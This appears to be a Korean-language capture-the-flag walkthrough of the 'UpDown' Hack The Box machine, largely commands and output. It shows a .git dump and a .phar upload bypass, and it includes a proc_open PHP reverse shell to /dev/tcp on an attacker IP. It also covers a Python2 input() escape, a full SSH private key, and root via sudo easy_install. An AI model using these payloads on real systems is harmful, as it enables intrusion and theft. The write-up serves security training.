Proof of Concept
10.129.227.227
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpInitial Access
80 포트 웹서비스에 접속 후 도메인 발견
- siteisup.htb
┌──(kali㉿kali)-[~/UpDown]
└─$ curl http://10.129.227.227
<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8' />
<meta http-equiv="X-UA-Compatible" content="chrome=1" />
<link rel="stylesheet" type="text/css" media="screen" href="stylesheet.css">
<title>Is my Website up ?</title>
</head>
<body>
<div id="header_wrap" class="outer">
<header class="inner">
<h1 id="project_title">Welcome,<br> Is My Website UP ?</h1>
<h2 id="project_tagline">Here you can check if your website is up or down.</h2>
</header>
</div>
<div id="main_content_wrap" class="outer">
<section id="main_content" class="inner">
<form method="POST">
<label>Website to check:</label><br><br>
<input type="text" name="site" value="" placeholder="http://google.com">
<input type="checkbox" id="debug" name="debug" value="1">
<label for="debug"> Debug mode (On/Off) </label><br>
<input type="submit" value="Check">
</form>
</section>
</div>
<div id="footer_wrap" class="outer">
<footer class="inner">
<p class="copyright">siteisup.htb</p><br>
</footer>
</div>
</body>
</html> /etc/hosts 파일 설정
┌──(kali㉿kali)-[~/UpDown]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.227.227 siteisup.htb서브도메인 탐색 결과 dev.siteisup.htb 발견
┌──(kali㉿kali)-[~/UpDown]
└─$ gobuster vhost -u http://siteisup.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --ad -t 100
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://siteisup.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
[+] Append Domain: true
[+] Exclude Hostname Length: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
dev.siteisup.htb Status: 403 [Size: 281]
#www.siteisup.htb Status: 400 [Size: 301]
#mail.siteisup.htb Status: 400 [Size: 301]
Progress: 19966 / 19966 (100.00%)
===============================================================
Finished
===============================================================/etc/hosts 파일에 서브도메인 추가
┌──(kali㉿kali)-[~/UpDown]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.227.227 siteisup.htb dev.siteisup.htbhttp://dev.siteisup.htb 접속 시 403 에러 발생
┌──(kali㉿kali)-[~/UpDown/git-dumper/.git]
└─$ curl http://dev.siteisup.htb
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at dev.siteisup.htb Port 80</address>
</body></html>http://siteisup.htb 하위 디렉토리 열거 결과 http://siteisup.htb/dev/.git/HEAD 발견
┌──(kali㉿kali)-[~/UpDown]
└─$ feroxbuster -u http://siteisup.htb -t 100 -s 200 -w /usr/share/dirb/wordlists/common.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://siteisup.htb/
🚩 In-Scope Url │ siteisup.htb
🚀 Threads │ 100
📖 Wordlist │ /usr/share/dirb/wordlists/common.txt
👌 Status Codes │ [200]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 320l 675w 5531c http://siteisup.htb/stylesheet.css
200 GET 40l 93w 1131c http://siteisup.htb/
200 GET 1l 2w 21c http://siteisup.htb/dev/.git/HEAD
200 GET 40l 93w 1131c http://siteisup.htb/index.php
200 GET 0l 0w 0c http://siteisup.htb/dev/index.php
[####################] - 35s 9233/9233 0s found:5 errors:135
[####################] - 31s 4614/4614 150/s http://siteisup.htb/
[####################] - 28s 4614/4614 165/s http://siteisup.htb/dev/ Git 레포지토리 덤프
┌──(kali㉿kali)-[~/UpDown/git-dumper]
└─$ git-dumper http://siteisup.htb/dev/.git/ .
[-] Testing http://siteisup.htb/dev/.git/HEAD [200]
[-] Testing http://siteisup.htb/dev/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://siteisup.htb/dev/.git/ [200]
[-] Fetching http://siteisup.htb/dev/.gitignore [404]
[-] http://siteisup.htb/dev/.gitignore responded with status code 404
[-] Fetching http://siteisup.htb/dev/.git/packed-refs [200]
[-] Fetching http://siteisup.htb/dev/.git/HEAD [200]
[-] Fetching http://siteisup.htb/dev/.git/branches/ [200]
[-] Fetching http://siteisup.htb/dev/.git/config [200]
[-] Fetching http://siteisup.htb/dev/.git/description [200]
[-] Fetching http://siteisup.htb/dev/.git/objects/ [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/ [200]
[-] Fetching http://siteisup.htb/dev/.git/info/ [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/ [200]
[-] Fetching http://siteisup.htb/dev/.git/index [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/ [200]
[-] Fetching http://siteisup.htb/dev/.git/objects/pack/ [200]
[-] Fetching http://siteisup.htb/dev/.git/objects/info/ [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/pre-commit.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/commit-msg.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/post-update.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/info/exclude [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/pre-push.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/push-to-checkout.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/pre-receive.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/hooks/update.sample [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/refs/ [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/remotes/ [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/HEAD [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/heads/ [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/tags/ [200]
[-] Fetching http://siteisup.htb/dev/.git/objects/pack/pack-30e4e40cb7b0c696d1ce3a83a6725267d45715da.pack [200]
[-] Fetching http://siteisup.htb/dev/.git/objects/pack/pack-30e4e40cb7b0c696d1ce3a83a6725267d45715da.idx [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/remotes/origin/ [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/refs/heads/ [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/heads/main [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/refs/remotes/ [200]
[-] Fetching http://siteisup.htb/dev/.git/refs/remotes/origin/HEAD [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/refs/heads/main [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/refs/remotes/origin/ [200]
[-] Fetching http://siteisup.htb/dev/.git/logs/refs/remotes/origin/HEAD [200]
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 6 paths from the indexGit 덤프한 파일 중 .htaccess에서 웹 서버 접근 시 “Special-Dev: only4dev” 헤더가 필요한 것을 확인
SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Order Deny,Allow
Deny from All
Allow from env=Required-Header“Special-Dev: only4dev” 헤더 추가 시 http://dev.siteisup.htb 접근 가능
┌──(kali㉿kali)-[~/UpDown/git-dumper/.git]
└─$ curl -H "Special-Dev: only4dev" http://dev.siteisup.htb
<b>This is only for developers</b>
<br>
<a href="?page=admin">Admin Panel</a>
<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8' />
<meta http-equiv="X-UA-Compatible" content="chrome=1" />
<link rel="stylesheet" type="text/css" media="screen" href="stylesheet.css">
<title>Is my Website up ? (beta version)</title>
</head>
<body>
<div id="header_wrap" class="outer">
<header class="inner">
<h1 id="project_title">Welcome,<br> Is My Website UP ?</h1>
<h2 id="project_tagline">In this version you are able to scan a list of websites !</h2>
</header>
</div>
<div id="main_content_wrap" class="outer">
<section id="main_content" class="inner">
<form method="post" enctype="multipart/form-data">
<label>List of websites to check:</label><br><br>
<input type="file" name="file" size="50">
<input name="check" type="submit" value="Check">
</form>
</section>
</div>
<div id="footer_wrap" class="outer">
<footer class="inner">
<p class="copyright">siteisup.htb (beta)</p><br>
<a class="changelog" href="changelog.txt">changelog.txt</a><br>
</footer>
</div>
</body>
</html> 이전에 Git 레포지토리에서 덤프한 파일 중 checker.php 파일 확인 결과, 업로드된 파일의 각 줄을 URL로 읽어 cURL로 HTTP 요청을 보내 사이트 상태를 체크한 후, uploads/[md5(time())]/에 임시 저장된 파일을 삭제하고 있음
<SNIP>
# Create directory to upload our file.
$dir = "uploads/".md5(time())."/";
if(!is_dir($dir)){
mkdir($dir, 0770, true);
}
# Upload the file.
$final_path = $dir.$file;
move_uploaded_file($_FILES['file']['tmp_name'], "{$final_path}");
# Read the uploaded file.
$websites = explode("\n",file_get_contents($final_path));
foreach($websites as $site){
$site=trim($site);
if(!preg_match("#file://#i",$site) && !preg_match("#data://#i",$site) && !preg_match("#ftp://#i",$site)){
$check=isitup($site);
if($check){
echo "<center>{$site}<br><font color='green'>is up ^_^</font></center>";
}else{
echo "<center>{$site}<br><font color='red'>seems to be down :(</font></center>";
}
}else{
echo "<center><font color='red'>Hacking attempt was detected !</font></center>";
}
}
# Delete the uploaded file.
@unlink($final_path)
<SNIP>이때 파일 PHP 실행 가능한 확장자를 검증하고 있지만, phar 확장자가 누락되어 우회 가능
<SNIP>
# Check if extension is allowed.
$ext = getExtension($file);
if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext));
die("Extension not allowed!");
}
<SNIP>임의의 php 코드 작성. 이때 파일이 삭제되는 것을 방지하기 위해, 공격자 서버로 http 통신 요청을 보내도록 공격자 서버 주소 추가
┌──(kali㉿kali)-[~/UpDown]
└─$ cat shell.phar
<?php echo phpinfo(); ?>
http://10.10.14.248공격자 서버에서 http 요청이 끊기지 않도록 k 옵션을 추가해서 80 포트 리스너 실행 후 shell.phar 파일 업로드 시, 공격자 서버로 http 요청이 들어오며 http://dev.siteisup.htb/uploads/ 디렉토리에서 삭제되지 않은 shell.phar 파일 확인 가능
┌──(kali㉿kali)-[~/UpDown/git-dumper/.git]
└─$ rlwrap nc -nlvkp 80
listening on [any] 80 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.227.227] 60246
GET / HTTP/1.1
Host: 10.10.14.248
User-Agent: siteisup.htb beta
Accept: */*업로드한 shell.phar 파일 접근 시 PHP 서버 설정을 확인 가능하며, disable_functions 항목에서 비활성화된 함수 확인
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,error_log,system,exec,shell_exec,popen,passthru,link,symlink,syslog,ld,mail,stream_socket_sendto,dl,stream_socket_client,fsockopenDfunc-Bypasser로 시스템 명령 실행 가능한 함수 확인 결과, proc_open 함수로 우회 가능
┌──(kali㉿kali)-[~/UpDown/dfunc-bypasser]
└─$ python2 dfunc-bypasser.py --file ../phpinfo.html
,---,
.' .' `\
,---.' \
| | .`\ |
: : | ' |
| ' ' ; :
' | ; . |
| | : | '
' : | / ;
| | '` ,/
; : .'
| ,.'
'---'
authors: __c3rb3ru5__, $_SpyD3r_$
Please add the following functions in your disable_functions option:
proc_open
If PHP-FPM is there stream_socket_sendto,stream_socket_client,fsockopen can also be used to be exploit by poisoning the request to the unix socketproc_open 함수를 이용한 PHP 리버스쉘 코드 작성
┌──(kali㉿kali)-[~/UpDown]
└─$ cat revshell.phar
<?php
$shell = 'bash -c "sh -i >& /dev/tcp/10.10.14.248/4444 0>&1"';
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open($shell, $descriptorspec, $pipes);
?>
http://10.10.14.248
이전과 동일하게 공격자 서버에서 http 요청이 끊기지 않도록 k 옵션을 추가해서 80 포트 리스너 실행 후 파일 업로드
┌──(kali㉿kali)-[~/UpDown]
└─$ rlwrap nc -nlvkp 80
listening on [any] 80 ...NC 리버스쉘 리스너 실행 후 업로드한 revshell.phar 접근 시, 리버스쉘이 연결됨
┌──(kali㉿kali)-[/usr/share/dirb/wordlists]
└─$ r
rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.248] from (UNKNOWN) [10.129.227.227] 60482
sh: 0: can't access tty; job control turned off
$Auth as developer
SetUID가 설정된 바이너리 탐색 결과, developer 소유이며 www-data 사용자가 실행 가능한 /home/developer/dev/siteisup 바이너리 파일 발견
www-data@updown:/$ find / -type f -perm -4000 -exec ls -l {} \; 2>/dev/null
find / -type f -perm -4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-- 1 root messagebus 51344 Apr 29 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 22840 Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 473576 Mar 30 2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 53040 Mar 14 2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 67816 Feb 7 2022 /usr/bin/su
-rwsr-xr-x 1 root root 39144 Feb 7 2022 /usr/bin/umount
-rwsr-xr-x 1 root root 166056 Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 88464 Mar 14 2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
-rwsr-sr-x 1 daemon daemon 55560 Nov 12 2018 /usr/bin/at
-rwsr-xr-x 1 root root 68208 Mar 14 2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 44784 Mar 14 2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 85064 Mar 14 2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 55528 Feb 7 2022 /usr/bin/mount
-rwsr-x--- 1 developer www-data 16928 Jun 22 2022 /home/developer/dev/siteisup/home/developer/dev/siteisup 바이너리 파일 분석 결과 /home/developer/dev/siteisup_test.py 파일을 실행하고 있음
int __cdecl main(int argc, const char **argv, const char **envp)
{
__gid_t rgid; // [rsp+28h] [rbp-8h]
__uid_t ruid; // [rsp+2Ch] [rbp-4h]
rgid = getegid();
ruid = geteuid();
setresgid(rgid, rgid, rgid);
setresuid(ruid, ruid, ruid);
puts("Welcome to 'siteisup.htb' application\n");
system("/usr/bin/python /home/developer/dev/siteisup_test.py");
return 0;
}/home/developer/dev/siteisup_test.py 파일 분석 결과, input 함수로 입력받은 URL에 GET 요청을 보내고 있음. 해당 파일은 Python2로 실행되며, 해당 버전에서는 input 함수로 입력받은 값이 파이썬 코드로 실행될 수 있음
import requests
url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
print "Website is up"
else:
print "Website is down"/home/developer/dev/siteisup 바이너리 실행 후 파이썬 코드를 입력하여 developer 사용자 쉘 획득
www-data@updown:/$ /home/developer/dev/siteisup
/home/developer/dev/siteisup
Welcome to 'siteisup.htb' application
Enter URL here:__import__('os').system('/bin/sh')
__import__('os').system('/bin/sh')
$ whoami
whoami
developerdeveloper 사용자 SSH Key 발견
developer@updown:/home/developer/.ssh$ cat id_rsa cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----획득한 SSH Key를 이용하여 SSH 접속 성공
┌──(kali㉿kali)-[~/UpDown]
└─$ ssh developer@10.129.227.227 -i id_rsa
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-122-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Feb 17 18:23:59 UTC 2026
System load: 0.14
Usage of /: 50.9% of 2.84GB
Memory usage: 26%
Swap usage: 0%
Processes: 231
Users logged in: 0
IPv4 address for eth0: 10.129.227.227
IPv6 address for eth0: dead:beef::250:56ff:feb0:bf92
=> There is 1 zombie process.
8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Tue Feb 17 18:23:50 2026 from 10.10.14.248
developer@updown:~$Read user.txt
developer@updown:~$ cat user.txt
649073c071852d29ab6e3f2537d1bfd7
developer@updown:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:bf:92 brd ff:ff:ff:ff:ff:ff
inet 10.129.227.227/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3406sec preferred_lft 3406sec
inet6 dead:beef::250:56ff:feb0:bf92/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb0:bf92/64 scope link
valid_lft forever preferred_lft foreverPrivilege Escalation
sudo 권한으로 /usr/local/bin/easy_install 실행 가능한 것을 확인
developer@updown:~$ sudo -l
Matching Defaults entries for developer on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User developer may run the following commands on localhost:
(ALL) NOPASSWD: /usr/local/bin/easy_installeasy_install을 이용하여 root 쉘 획득
developer@updown:~$ echo 'import os; os.system("exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty")' >setup.py
developer@updown:~$ sudo easy_install .
WARNING: The easy_install command is deprecated and will be removed in a future version.
Processing .
Writing /home/developer/setup.cfg
Running setup.py -q bdist_egg --dist-dir /home/developer/egg-dist-tmp-sbqor0
# id
uid=0(root) gid=0(root) groups=0(root)Read root.txt
# cat /root/root.txt
a87a0599d456f55650ec14df912145fe
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:bf:92 brd ff:ff:ff:ff:ff:ff
inet 10.129.227.227/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3227sec preferred_lft 3227sec
inet6 dead:beef::250:56ff:feb0:bf92/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb0:bf92/64 scope link
valid_lft forever preferred_lft forever